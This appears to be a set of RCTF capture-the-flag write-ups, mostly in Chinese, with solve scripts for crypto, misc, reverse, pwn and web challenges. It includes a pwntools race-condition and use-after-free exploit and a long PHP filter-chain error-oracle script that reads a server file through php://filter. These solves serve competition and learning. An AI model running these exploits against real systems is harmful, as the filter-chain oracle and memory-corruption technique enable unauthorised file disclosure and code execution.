dst = [0x88, 0x0D, 0xEB, 0x27, 0x18, 0x3B, 0x5E, 0x58, 0x31, 0xA4, 0xAE, 0x9E, 0x49, 0x5A, 0x26, 0x13, 0x70, 0xA5, 0xD6, 0x78,0x72, 0x87, 0xB6, 0x10,0x00]
m = 'rctf{1111111111111111111}'
for i in range(len(m)):
a = ord(m[i]) ^ 0x7d
b = ((a << 6) | (a >> 2) & 0x3F) & 0xff
c = des[i] ^ dst[i] ^ b
d = (((c << 2) | (c >> 6)) & 0xff) ^ 0x7d
print(chr(d),end='')
#RCTF{a_baby_debug_bloker}
Misc-Logo: 2024
尝试用每个字符代替连续的符号,将换行特殊标注
x='''x<!!!ex$#"'+!"!"*+3(-&x$#"+)/*3&2#x$#('(%:$-$,$"x$#+%&$+#.$,$3x#$-$%$+$-$,$3x#$.#$$-#-#-$3x#$.$#$-$,#.%1x#$.$##/#,#/&/x#$.#$#/#,#1&-x#$-$$#/#+$4&*x#$,$%#/#+$6%)x#$$+&#.$+$8%'x#$$)($-$+$:$&x#$)$)#-#,$:$&x#$*$($+#-$:$&x#$+$($)$-$-$)$&x#$,#)%&#,'/%$%'x##.!+),2)+)x$!?"N$,x'''
logo = '#' * 100 + (lambda x: (lambda f, x: f(f, x))(lambda f, x: x and ((x[0] == 'x') * 'n' or '# '[len(x)%2] * (ord(x[0])-32)) + f(f, x[1:]), x))(x) + '#' * 100
Crypto-Hello, XCTF!
考虑把所有字符都减去一个值,转化成小量
for i in b'xctfXCTF':
print(i, chr(i), [j-i for j in b'xctfXCTF'])
'''
120 x [0, -21, -4, -18, -32, -53, -36, -50]
99 c [21, 0, 17, 3, -11, -32, -15, -29]
116 t [4, -17, 0, -14, -28, -49, -32, -46]
102 f [18, -3, 14, 0, -14, -35, -18, -32]
88 X [32, 11, 28, 14, 0, -21, -4, -18]
67 C [53, 32, 49, 35, 21, 0, 17, 3]
84 T [36, 15, 32, 18, 4, -17, 0, -14]
70 F [50, 29, 46, 32, 18, -3, 14, 0]
减去一个f效果很好,可以取{-14, 0, 14} or {-18, 0, 18}
'''
比如我减去b'f'之后,只考虑取{-14, 0, 14}的情况,然后整个式子乘以14^-1 mod p就转化成了01向量求解
然后用BKZ去解
from Crypto.Util.number import bytes_to_long as b2l, getPrime
from sage.all import *
while True:
p = getPrime(100)
c = ZZ((b2l(b'hello') - b2l(b'$') - sum([102*256^(i+1) % p for i in range(64)])) % p)
K = 2^100
L = block_matrix(ZZ, [
[1, K*matrix(ZZ, [ZZ(256^(i+1)*14 % p) for i in range(64)]).T, 0],
[0, K*p, 0],
[0, K*c, 1]
]).BKZ(block_size=36)
for row in L:
if abs(row[-1]) == 1 and row[-2] == 0:
ans = row[:-2]
if set(ans) == set({-1, 0, 1}):
print(set(ans))
print(ans)
print(p)
# print([_.nbits() for _ in ans])
print("not this time")
找到一个解是这样的
from Crypto.Util.number import bytes_to_long as b2l, getPrime
ans = (-1, 1, -1, 0, 1, 1, -1, 0, 0, 0, 0, 1, 0, 0, 1, 1, -1, -1, 0, 1, 0, 0, -1, 0, 0, 1, 0, 0, 1, 1, 1, 1, -1, -1, 0, 1, 0, 1, 0, 0, 0, -1, 0, 0, 0, 0, -1, 1, 0, -1, 1, 0, -1, -1, 0, -1, 0, 0, 1, 1, -1, 1, 1, -1)
p = 792444903172480736339328615467
hello = bytes([(ans[i]*14+102) for i in range(64)])[::-1].decode()
print(b2l(f"{hello}$".encode()) % p, b2l(b'hello'))
print(hello)
Crypto-D³
fac = [2, 3, 3, 7, 79, 2731, 4057, 8191, 121369, 22366891, 6740339310641, 10030854869257, 4929910764223610387, 4966300248405749059, 18526238646011086732742614043, 3340762283952395329506327023033, 167510000247425697384594847173622455701743569339841261429683667, 8342680841093063014359532631803433656669591074421858694040109486076573471951766107416262860801]
rctf_exp = 351111940402796075728379920075981393284761128699669252487168127261196632432619068618571244770327218791250222421623815151677323767215657465806342637967722899175327916845440400930277772658683777577056802640791026892262013051450122815378736544025053197584668966180832613749896964723593195907881555331297312765
print(rctf_exp == 2^1015-3)
print(prod(fac) == rctf_exp + 1)
def get_qs(t):
fac = [2, 3, 3, 7, 79, 2731, 4057, 8191, 121369, 22366891, 6740339310641, 10030854869257, 4929910764223610387, 4966300248405749059, 18526238646011086732742614043, 3340762283952395329506327023033, 167510000247425697384594847173622455701743569339841261429683667, 8342680841093063014359532631803433656669591074421858694040109486076573471951766107416262860801]
fac = fac[2:]
qs = set()
# q = 2*prod(rs) + 1
import itertools, tqdm
for i in range(t):
for rs in tqdm.tqdm(itertools.combinations(fac, int(i+1))):
q = 2*prod(rs) + 1
if is_prime(q) and q.nbits() < 1024:
qs.add(q)
print(len(qs))
qs = sorted(list(qs))
return qs
qs = get_qs(10)
is_lucky_prime = (
lambda num: isPrime(num)
and num.bit_length() == P_SIZE
and bin(int.from_bytes(sha256(str(num).encode()).digest(), "big")).endswith(
"0" * DIFFICULTY
)
and GCD(num - 1, e) == 1
)
def dfs(ind, res):
for k in range(1, 4):
p = 2^k*res + 1
if is_prime(p) and p.nbits() == 1024:
print("prime", pow(e, t+1, p-1), p)
if is_lucky_prime(int(p)):
print("lucky")
return
for i in range(ind, len(qs)):
now = res * qs[i]
if now.nbits() > 1024:break
dfs(i+1, now)
dfs(0, 1)
'''
p1 = 168312142677725750367044818506464853221501973359637068899337864593789734337930832127218753252601579479619754024424538435698690189358097728253658473189138983012957954574380246327072566998358272732420350181004301003028682435470474514344936307741432964104759484827720936023897939287801141235396023635511537498167
p2 = 102391737224294102267645035476586812633757754295389575058582673253840471906926827577899604818119403719761970122309481400224059448181653971301486918281305433804858356369828191223960728889673157973545072351217238178470280420847474853138355453101118450562015319343664086575926470611914284698319447585936189861343
'''
from pwn import *
e = 3
rctf_exp = 351111940402796075728379920075981393284761128699669252487168127261196632432619068618571244770327218791250222421623815151677323767215657465806342637967722899175327916845440400930277772658683777577056802640791026892262013051450122815378736544025053197584668966180832613749896964723593195907881555331297312765
t = rctf_exp
p1 = 168312142677725750367044818506464853221501973359637068899337864593789734337930832127218753252601579479619754024424538435698690189358097728253658473189138983012957954574380246327072566998358272732420350181004301003028682435470474514344936307741432964104759484827720936023897939287801141235396023635511537498167
p2 = 102391737224294102267645035476586812633757754295389575058582673253840471906926827577899604818119403719761970122309481400224059448181653971301486918281305433804858356369828191223960728889673157973545072351217238178470280420847474853138355453101118450562015319343664086575926470611914284698319447585936189861343
print(pow(e, t+1, p1-1))
print(pow(e, t+1, p2-1))
host, port = '121.37.167.239 10088'.split()
while True:
io = remote(host, port)
io.sendlineafter(b'p (1024-bit lucky prime): ', str(p1).encode())
io.sendlineafter(b'q (1024-bit lucky prime): ', str(p2).encode())
print(io.recvline())
io.close()
Pwn-TaskGo
c++,第一次见这种任务调度的,不知道攻击点在不在里面
先看看主要的ctfmain部分吧
在magic中输入1337,可以进入MagicHeld::Gods。可以泄露system地址
BackDoor看起来是以文件名为参数,读出内容
似乎需要控制player中的scroll结构体
这里有一个条件竞争,可以对money整数溢出
sla('tell me your name:',b'a')
sl(str(1))
sl(str(3))
sl(str(2))
sl(str(1))
sl(str(1))
把所有scroll买了,然后学习,进入god
sla('tell me your name:',b'a')
sl(str(1))
sl(str(3))
sl(str(2))
sl(str(1))
sl(str(1))
sl(str(3))
sl(str(2))
sl(str(3))
sl(str(2))
sl(str(2))
sl(str(2))
sl(str(1))
sl(str(2))
sl(str(2))
sl(str(3))
sl(str(2))
sl(str(2))
sl(str(2))
sl(str(1))
sl(str(3))
sl(str(2))
sl(str(3))
sl(str(2))
sl(str(1337))
gift是后门地址,,感觉接下来是对NoteStar进行操作。
在god启动时会停5秒,依然是条件竞争
这时把scroll释放,然后在NoteStar会申请回这块内存,然后写入backdoor地址,就可以执行
from pwn import *
context.arch='amd64'
context.os='linux'
context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
choice=0
if choice==1:
p=process('./11')
else:
p=remote("1.94.107.129",10088)
s = lambda data :p.send(data)
sl = lambda data :p.sendline(data)
sa = lambda x,data :p.sendafter(x, data)
sla = lambda x,data :p.sendlineafter(x, data)
r = lambda num=4096 :p.recv(num)
rl = lambda num=4096 :p.recvline(num)
ru = lambda x :p.recvuntil(x)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,b'x00'))
uu64 = lambda data :u64(data.ljust(8,b'x00'))
uru64 = lambda :uu64(ru('x7f')[-6:])
leak = lambda name :log.success('{} = {}'.format(name, hex(eval(name))))
libc_os = lambda x :libc_base + x
libc_sym = lambda x :libc_os(libc.sym[x])
def get_sb():
return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))
def debug(cmd=''):
gdb.attach(p,cmd)
pause()
# debug('b BackDoor')
sla('tell me your name:',b'/flag')
sl(str(1))
sl(str(3))
sl(str(2))
sl(str(1))
sl(str(1))
sl(str(3))
ru('money you have is ')
sl(str(2))
sl(str(3))
sl(str(2))
sl(str(3))
sl(str(2))
sl(str(2))
sl(str(2))
sl(str(1))
sl(str(2))
sl(str(2))
sl(str(3))
sl(str(2))
sl(str(2))
sl(str(2))
sl(str(1))
sl(str(3))
sl(str(2))
sl(str(3))
sl(str(2))
sl(str(1337))
sla('realm!!!',str(3))
ru('gift: ')
backdoor=int(r(14),16)
leak('backdoor')
sl(str(3))
sl(str(2))
sl(str(1337))
sl(str(2))
sl(str(2))
sl(str(1))
sl(str(1))
sla('next visit.',str(3))
sla('Input the Comments: ',b'x00'*0x28+p64(backdoor))
p.interactive()
Crypto-SignSystem
朴素的hnp
from sage.all import *
from pwn import *
from Crypto.Util.number import *
from hashlib import sha1
def sign(msg: bytes):
io.sendlineafter(b'>', b'1')
io.sendlineafter(b"Which message to sign?: ", msg)
io.recvuntil(b'Signature: ')
r, s = eval(io.recvline().strip().decode())
return r, s
# ki = msb*2^(150+2) + mki*2^2 + lsb
# si*ki = = h + x * ri
# si*rj*ki - sj*ri*kj = h*(rj-ri)
# si*rj*2^2*mki - sj*ri*2^2*mkj + (si*rj - sj*ri)*() - h*(rj-ri) = 0 mod q
def crack(msb, lsb):
t = len(sigs) - 1
h = int(sha1(b'rec').hexdigest(), 16)
A = matrix(ZZ, 1, t)
B = matrix(ZZ, 1, t)
for i in range(t):
ri, si = sigs[0]
rj, sj = sigs[i + 1]
inv = inverse_mod(sj*ri*2^(ZZ(lsb).nbits()), q)
A[0, i] = ZZ((si*rj*2^(ZZ(lsb).nbits()))*inv % q)
B[0, i] = ZZ(((si*rj - sj*ri)*(msb*2^(kbits+ZZ(lsb).nbits()) + lsb) - h*(rj-ri))*inv % q)
L = block_matrix(ZZ, [
[1, A, 0],
[0, q, 0],
[0, B, q],
])
L = L.LLL()
for row in L:
# print([_.nbits() for _ in row])
if abs(row[-1]) == q:
mk0 = abs(row[0])
k0 = msb*2^(kbits+ZZ(lsb).nbits()) + mk0*2^(ZZ(lsb).nbits()) + lsb
r0, s0 = sigs[0]
x = ZZ((s0*k0-h)*inverse_mod(r0, q) % q)
# print(x)
if pow(g, x, p) == y:
return x
while True:
host, port = '121.37.182.7 10089'.split()
io = remote(host, int(port))
io.recvuntil(b'your pubKey: ')
pub = eval(io.recvline().strip().decode())
p, q, g, y = pub
h = int(sha1(b'rec').hexdigest(), 16)
kbits = 150
lbits = 2
mbits = 8
sigs = [sign(b'rec') for _ in range(19)]
import itertools, tqdm
for msb in tqdm.tqdm(itertools.product(range(2), repeat=mbits)):
msb = int(''.join(map(str, msb)), 2)
for lsb in itertools.product(range(2), repeat=lbits):
lsb = int(''.join(map(str, lsb)), 2)
ans = crack(msb, lsb)
if ans:
print(f"{p = }n{q = }n{g = }n{y = }n{h = }")
print(ans)
x = ZZ(ans)
k = 233
r = ZZ(pow(g, k, p)) % q
h = int(sha1(b"get flag").hexdigest(), 16)
s = (h+x*r)*inverse_mod(k, q)%q
print(f"{r = }n{s = }")
io.interactive()
io.close()
print("not this time")Web-color
点完之后拿到一个压缩包
http://124.71.164.28:10088/secr3tcolor.zip
action=xEt6B2i+YJdcrJ/RG3Ie4Q==进入checkImage
测信道攻击
Flag RCTF{Color_Col0r_C0lor}
import requests
import sys
import time
from base64 import b64decode
"""
THE GRAND IDEA:
We can use PHP memory limit as an error oracle. Repeatedly applying the convert.iconv.L1.UCS-4LE
filter will blow up the string length by 4x every time it is used, which will quickly cause
500 error if and only if the string is non empty. So we now have an oracle that tells us if
the string is empty.
THE GRAND IDEA 2:
The dechunk filter is interesting.
https://github.com/php/php-src/blob/01b3fc03c30c6cb85038250bb5640be3a09c6a32/ext/standard/filters.c#L1724
It looks like it was implemented for something http related, but for our purposes, the interesting
behavior is that if the string contains no newlines, it will wipe the entire string if and only if
the string starts with A-Fa-f0-9, otherwise it will leave it untouched. This works perfect with our
above oracle! In fact we can verify that since the flag starts with D that the filter chain
dechunk|convert.iconv.L1.UCS-4LE|convert.iconv.L1.UCS-4LE|[...]|convert.iconv.L1.UCS-4LE
does not cause a 500 error.
THE REST:
So now we can verify if the first character is in A-Fa-f0-9. The rest of the challenge is a descent
into madness trying to figure out ways to:
- somehow get other characters not at the start of the flag file to the front
- detect more precisely which character is at the front
"""
def join(*x):
return '|'.join(x)
def err(s):
print(s)
raise ValueError
def req(s):
datas="""------WebKitFormBoundary6ggLD4mNz6woJLXM
Content-Disposition: form-data; name="image"; filename="chenxi.jpg"
Content-Type: image/jpeg
[payload]
------WebKitFormBoundary6ggLD4mNz6woJLXM
Content-Disposition: form-data; name="action";
xEt6B2i+YJdcrJ/RG3Ie4Q==
------WebKitFormBoundary6ggLD4mNz6woJLXM--
"""
headers = {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary6ggLD4mNz6woJLXM"}
datas = datas.replace('[payload]',f'php://filter/{s}/resource=/flag.txt')
#print(f'php://filter/{s}/resource=/etc/passwd')
datas = datas.replace('n','rn')
res = requests.post('http://124.71.164.28:10088/final/game.php', data=datas,headers=headers).text
#print(res)
return "Allowed memory size" in res
"""
Step 1:
The second step of our exploit only works under two conditions:
- String only contains a-zA-Z0-9
- String ends with two equals signs
base64-encoding the flag file twice takes care of the first condition.
We don't know the length of the flag file, so we can't be sure that it will end with two equals
signs.
Repeated application of the convert.quoted-printable-encode will only consume additional
memory if the base64 ends with equals signs, so that's what we are going to use as an oracle here.
If the double-base64 does not end with two equals signs, we will add junk data to the start of the
flag with convert.iconv..CSISO2022KR until it does.
"""
blow_up_enc = join(*['convert.quoted-printable-encode']*1000)
blow_up_utf32 = 'convert.iconv.L1.UCS-4LE'
blow_up_inf = join(*[blow_up_utf32]*50)
header = 'convert.base64-encode|convert.base64-encode'
# Start get baseline blowup
print('Calculating blowup')
baseline_blowup = 0
for n in range(100):
payload = join(*[blow_up_utf32]*n)
if req(f'{header}|{payload}'):
baseline_blowup = n
break
else:
err('something wrong')
print(f'baseline blowup is {baseline_blowup}')
trailer = join(*[blow_up_utf32]*(baseline_blowup-1))
assert req(f'{header}|{trailer}') == False
print('detecting equals')
j = [
req(f'convert.base64-encode|convert.base64-encode|{blow_up_enc}|{trailer}'),
req(f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.base64-encode{blow_up_enc}|{trailer}'),
req(f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.iconv..CSISO2022KR|convert.base64-encode|{blow_up_enc}|{trailer}')
]
print(j)
if sum(j) != 2:
err('something wrong')
if j[0] == False:
header = f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.base64-encode'
elif j[1] == False:
header = f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.iconv..CSISO2022KRconvert.base64-encode'
elif j[2] == False:
header = f'convert.base64-encode|convert.base64-encode'
else:
err('something wrong')
print(f'j: {j}')
print(f'header: {header}')
"""
Step two:
Now we have something of the form
[a-zA-Z0-9 things]==
Here the pain begins. For a long time I was trying to find something that would allow me to strip
successive characters from the start of the string to access every character. Maybe something like
that exists but I couldn't find it. However, if you play around with filter combinations you notice
there are filters that *swap* characters:
convert.iconv.CSUNICODE.UCS-2BE, which I call r2, flips every pair of characters in a string:
abcdefgh -> badcfehg
convert.iconv.UCS-4LE.10646-1:1993, which I call r4, reverses every chunk of four characters:
abcdefgh -> dcbahgfe
This allows us to access the first four characters of the string. Can we do better? It turns out
YES, we can! Turns out that convert.iconv.CSUNICODE.CSUNICODE appends <0xff><0xfe> to the start of
the string:
abcdefgh -> <0xff><0xfe>abcdefgh
The idea being that if we now use the r4 gadget, we get something like:
ba<0xfe><0xff>fedc
And then if we apply a convert.base64-decode|convert.base64-encode, it removes the invalid
<0xfe><0xff> to get:
bafedc
And then apply the r4 again, we have swapped the f and e to the front, which were the 5th and 6th
characters of the string. There's only one problem: our r4 gadget requires that the string length
is a multiple of 4. The original base64 string will be a multiple of four by definition, so when
we apply convert.iconv.CSUNICODE.CSUNICODE it will be two more than a multiple of four, which is no
good for our r4 gadget. This is where the double equals we required in step 1 comes in! Because it
turns out, if we apply the filter
convert.quoted-printable-encode|convert.quoted-printable-encode|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7
It will turn the == into:
+---AD0-3D3D+---AD0-3D3D
And this is magic, because this corrects such that when we apply the
convert.iconv.CSUNICODE.CSUNICODE filter the resuting string is exactly a multiple of four!
Let's recap. We have a string like:
abcdefghij==
Apply the convert.quoted-printable-encode + convert.iconv.L1.utf7:
abcdefghij+---AD0-3D3D+---AD0-3D3D
Apply convert.iconv.CSUNICODE.CSUNICODE:
<0xff><0xfe>abcdefghij+---AD0-3D3D+---AD0-3D3D
Apply r4 gadget:
ba<0xfe><0xff>fedcjihg---+-0DAD3D3---+-0DAD3D3
Apply base64-decode | base64-encode, so the '-' and high bytes will disappear:
bafedcjihg+0DAD3D3+0DAD3Dw==
Then apply r4 once more:
efabijcd0+gh3DAD0+3D3DAD==wD
And here's the cute part: not only have we now accessed the 5th and 6th chars of the string, but
the string still has two equals signs in it, so we can reapply the technique as many times as we
want, to access all the characters in the string ;)
"""
flip = "convert.quoted-printable-encode|convert.quoted-printable-encode|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.CSUNICODE.CSUNICODE|convert.iconv.UCS-4LE.10646-1:1993|convert.base64-decode|convert.base64-encode"
r2 = "convert.iconv.CSUNICODE.UCS-2BE"
r4 = "convert.iconv.UCS-4LE.10646-1:1993"
def get_nth(n):
global flip, r2, r4
o = []
chunk = n // 2
if chunk % 2 == 1: o.append(r4)
o.extend([flip, r4] * (chunk // 2))
if (n % 2 == 1) ^ (chunk % 2 == 1): o.append(r2)
return join(*o)
"""
Step 3:
This is the longest but actually easiest part. We can use dechunk oracle to figure out if the first
char is 0-9A-Fa-f. So it's just a matter of finding filters which translate to or from those
chars. rot13 and string lower are helpful. There are probably a million ways to do this bit but
I just bruteforced every combination of iconv filters to find these.
Numbers are a bit trickier because iconv doesn't tend to touch them.
In the CTF you coud porbably just guess from there once you have the letters. But if you actually
want a full leak you can base64 encode a third time and use the first two letters of the resulting
string to figure out which number it is.
"""
rot1 = 'convert.iconv.437.CP930'
be = 'convert.quoted-printable-encode|convert.iconv..UTF7|convert.base64-decode|convert.base64-encode'
o = ''
def find_letter(prefix):
if not req(f'{prefix}|dechunk|{blow_up_inf}'):
# a-f A-F 0-9
if not req(f'{prefix}|{rot1}|dechunk|{blow_up_inf}'):
# a-e
for n in range(5):
if req(f'{prefix}|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):
return 'edcba'[n]
break
else:
err('something wrong')
elif not req(f'{prefix}|string.tolower|{rot1}|dechunk|{blow_up_inf}'):
# A-E
for n in range(5):
if req(f'{prefix}|string.tolower|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):
return 'EDCBA'[n]
break
else:
err('something wrong')
elif not req(f'{prefix}|convert.iconv.CSISO5427CYRILLIC.855|dechunk|{blow_up_inf}'):
return '*'
elif not req(f'{prefix}|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
# f
return 'f'
elif not req(f'{prefix}|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
# F
return 'F'
else:
err('something wrong')
elif not req(f'{prefix}|string.rot13|dechunk|{blow_up_inf}'):
# n-s N-S
if not req(f'{prefix}|string.rot13|{rot1}|dechunk|{blow_up_inf}'):
# n-r
for n in range(5):
if req(f'{prefix}|string.rot13|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):
return 'rqpon'[n]
break
else:
err('something wrong')
elif not req(f'{prefix}|string.rot13|string.tolower|{rot1}|dechunk|{blow_up_inf}'):
# N-R
for n in range(5):
if req(f'{prefix}|string.rot13|string.tolower|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):
return 'RQPON'[n]
break
else:
err('something wrong')
elif not req(f'{prefix}|string.rot13|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
# s
return 's'
elif not req(f'{prefix}|string.rot13|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
# S
return 'S'
else:
err('something wrong')
elif not req(f'{prefix}|{rot1}|string.rot13|dechunk|{blow_up_inf}'):
# i j k
if req(f'{prefix}|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'k'
elif req(f'{prefix}|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'j'
elif req(f'{prefix}|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'i'
else:
err('something wrong')
elif not req(f'{prefix}|string.tolower|{rot1}|string.rot13|dechunk|{blow_up_inf}'):
# I J K
if req(f'{prefix}|string.tolower|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'K'
elif req(f'{prefix}|string.tolower|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'J'
elif req(f'{prefix}|string.tolower|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'I'
else:
err('something wrong')
elif not req(f'{prefix}|string.rot13|{rot1}|string.rot13|dechunk|{blow_up_inf}'):
# v w x
if req(f'{prefix}|string.rot13|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'x'
elif req(f'{prefix}|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'w'
elif req(f'{prefix}|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'v'
else:
err('something wrong')
elif not req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|dechunk|{blow_up_inf}'):
# V W X
if req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'X'
elif req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'W'
elif req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'V'
else:
err('something wrong')
elif not req(f'{prefix}|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):
# Z
return 'Z'
elif not req(f'{prefix}|string.toupper|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):
# z
return 'z'
elif not req(f'{prefix}|string.rot13|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):
# M
return 'M'
elif not req(f'{prefix}|string.rot13|string.toupper|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):
# m
return 'm'
elif not req(f'{prefix}|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):
# y
return 'y'
elif not req(f'{prefix}|string.tolower|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):
# Y
return 'Y'
elif not req(f'{prefix}|string.rot13|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):
# l
return 'l'
elif not req(f'{prefix}|string.tolower|string.rot13|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):
# L
return 'L'
elif not req(f'{prefix}|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):
# h
return 'h'
elif not req(f'{prefix}|string.tolower|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):
# H
return 'H'
elif not req(f'{prefix}|string.rot13|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):
# u
return 'u'
elif not req(f'{prefix}|string.rot13|string.tolower|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):
# U
return 'U'
elif not req(f'{prefix}|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
# g
return 'g'
elif not req(f'{prefix}|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
# G
return 'G'
elif not req(f'{prefix}|string.rot13|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
# t
return 't'
elif not req(f'{prefix}|string.rot13|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
# T
return 'T'
else:
err('something wrong')
print()
for i in range(100):
prefix = f'{header}|{get_nth(i)}'
letter = find_letter(prefix)
# it's a number! check base64
if letter == '*':
prefix = f'{header}|{get_nth(i)}|convert.base64-encode'
s = find_letter(prefix)
if s == 'M':
# 0 - 3
prefix = f'{header}|{get_nth(i)}|convert.base64-encode|{r2}'
ss = find_letter(prefix)
if ss in 'CDEFGH':
letter = '0'
elif ss in 'STUVWX':
letter = '1'
elif ss in 'ijklmn':
letter = '2'
elif ss in 'yz*':
letter = '3'
else:
err(f'bad num ({ss})')
elif s == 'N':
# 4 - 7
prefix = f'{header}|{get_nth(i)}|convert.base64-encode|{r2}'
ss = find_letter(prefix)
if ss in 'CDEFGH':
letter = '4'
elif ss in 'STUVWX':
letter = '5'
elif ss in 'ijklmn':
letter = '6'
elif ss in 'yz*':
letter = '7'
else:
err(f'bad num ({ss})')
elif s == 'O':
# 8 - 9
prefix = f'{header}|{get_nth(i)}|convert.base64-encode|{r2}'
ss = find_letter(prefix)
if ss in 'CDEFGH':
letter = '8'
elif ss in 'STUVWX':
letter = '9'
else:
err(f'bad num ({ss})')
else:
err('wtf')
print(end=letter)
o += letter
sys.stdout.flush()
"""
We are done!! :)
"""
print()
d = b64decode(o.encode() + b'=' * 4)
# remove KR padding
d = d.replace(b'$)C',b'')
print(b64decode(d))
Misc-s1ayth3sp1re
反编译jar
搜索3000
貌似是个逆向。。。
iArr = [164, 158, 95, 107, 4, 215, 108, 115, 5, 8, 25, 57, 41, 236, 231, 17, 85]
iArr2 = [246, 221, 11, 45, 127, 148, 45, 36, 70, 73, 78, 8, 98, 141, 140, 112, 40]
str1 = "".join([chr(a ^ b) for a, b in zip(iArr, iArr2)])
iArr3 = [100, 174, 197, 56]
iArr4 = [2, 256, 164, 95]
iArr4[1] = 256
str2 = "".join([chr(a ^ b) for a, b in zip(iArr3, iArr4)])
Crypto-SignSystem: Dilithium
算法摘要
关键参数(截取自源码注释)
#define SEEDBYTES 32
#define CRHBYTES 48
#define N 256
#define Q 8380417
#define D 13
#define ROOT_OF_UNITY 1753
* Name: pack_pk
*
* Description: Bit-pack public key pk = (rho, t1).
*
* Arguments: - uint8_t pk[]: output byte array
* - const uint8_t rho[]: byte array containing rho
* - const polyveck *t1: pointer to vector t1
* Name: pack_sk
*
* Description: Bit-pack secret key sk = (rho, tr, key, t0, s1, s2).
*
* Arguments: - uint8_t sk[]: output byte array
* - const uint8_t rho[]: byte array containing rho
* - const uint8_t tr[]: byte array containing tr
* - const uint8_t key[]: byte array containing key
* - const polyveck *t0: pointer to vector t0
* - const polyvecl *s1: pointer to vector s1
* - const polyveck *s2: pointer to vector s2
* Name: pack_sig
*
* Description: Bit-pack signature sig = (c, z, h).
*
* Arguments: - uint8_t sig[]: output byte array
* - const uint8_t *c: pointer to challenge hash length SEEDBYTES
* - const polyvecl *z: pointer to vector z
* - const polyveck *h: pointer to hint vector h
关于challenge的代码(即挑战c的产生
* Name: challenge
*
* Description: Implementation of H. Samples polynomial with TAU nonzero
* coefficients in {-1,1} using the output stream of
* SHAKE256(seed).
*
* Arguments: - poly *c: pointer to output polynomial
* - const uint8_t mu[]: byte array containing seed of length SEEDBYTES
patched函数的调用链
task.c(crypto_sign) -> sign.c(crypto_sign_signature) -> sign.c(polyvecl_uniform_gamma1) -> polyvec.c(poly_uniform_gamma1) -> poly.c(polyy_unpack)
版本
#if DILITHIUM_MODE == 2
#define K 4
#define L 3
#define ETA 2
#define TAU 39
#define BETA 78
#define GAMMA1 (1 << 17)
#define GAMMA2 ((Q-1)/88)
#define OMEGA 80
#TODO
已知Zq/(x^n+1)上的多项式z,y,c,s1
满足:z=y+c*s1
其中:
1.s1是[-2,+2]的值
2.y的系数均可被49整除
求解:s1
发现c也是系数很小很稀疏的polynomial,因此c*s1的值为真实值,在F7/(x^N+1)上即可还原s1的值
根据https://eprint.iacr.org/2018/821.pdf,恢复了部分私钥s1可以伪造有效签名
因此利用cpp源码构造pk、sig的解析,sage求出s1后再输入回去,构造私钥伪造签名即可
